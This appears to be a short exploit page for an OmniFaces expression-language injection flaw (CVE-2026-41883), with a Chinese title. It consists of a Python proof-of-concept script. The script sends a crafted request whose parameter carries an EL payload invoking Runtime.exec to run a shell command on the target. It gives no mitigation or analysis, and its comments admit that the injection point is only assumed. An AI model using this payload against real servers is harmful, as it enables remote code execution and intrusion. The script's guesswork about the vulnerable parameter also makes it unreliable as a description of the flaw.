CVE-2026-41883 OmniFaces 远程代码执行漏洞

import requests """ Proof of Concept for CVE-2026-41883 (OmniFaces EL Injection) Target: OmniFaces application with wildcard CDN mapping enabled. Description: This script sends a malicious request containing an EL expression to execute a system command (e.g., 'touch /tmp/pwned' on Linux). """ target_url = "http://localhost:8080/app/javax.faces.resource/fake.js.xhtml" # EL payload to execute a shell command # Example: Creating a file to prove execution payload = "#{request.servletContext.getClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('touch /tmp/pwned')}" # Parameters typically used in CDN resource handling # 'ln' often matches the library name mapping, 'r' or resource identifier might hold the injection point # Depending on the exact implementation, the injection point might be in the path or query parameter. # Here we assume the resource identifier is vulnerable. params = { "ln": "*", # Wildcard library mapping "r": payload # Injecting EL into the resource name } try: response = requests.get(target_url, params=params) print(f"[+] Request sent to: {response.url}") print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print("[+] Request successful. Check if the command was executed on the target.") else: print("[-] Request failed or server returned an error.") except Exception as e: print(f"[-] An error occurred: {e}")